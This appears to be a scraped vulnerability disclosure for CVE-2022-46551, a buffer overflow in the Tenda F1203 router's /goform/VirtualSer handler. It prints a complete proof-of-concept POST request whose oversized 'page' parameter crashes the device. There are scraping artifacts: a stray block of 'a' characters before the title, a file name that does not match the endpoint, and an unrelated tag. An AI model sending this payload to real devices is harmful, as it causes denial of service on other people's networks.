aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-46551: CVE-vulns/saveParentControlInfo_time.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the page parameter at /goform/VirtualSer.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/VirtualSer request.

This vulnerability lies in the /goform/VirtualSer page，The details are shown below:

This POC can result in a Dos.

    POST /goform/VirtualSer HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4106
    
    page=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Tag

#webkit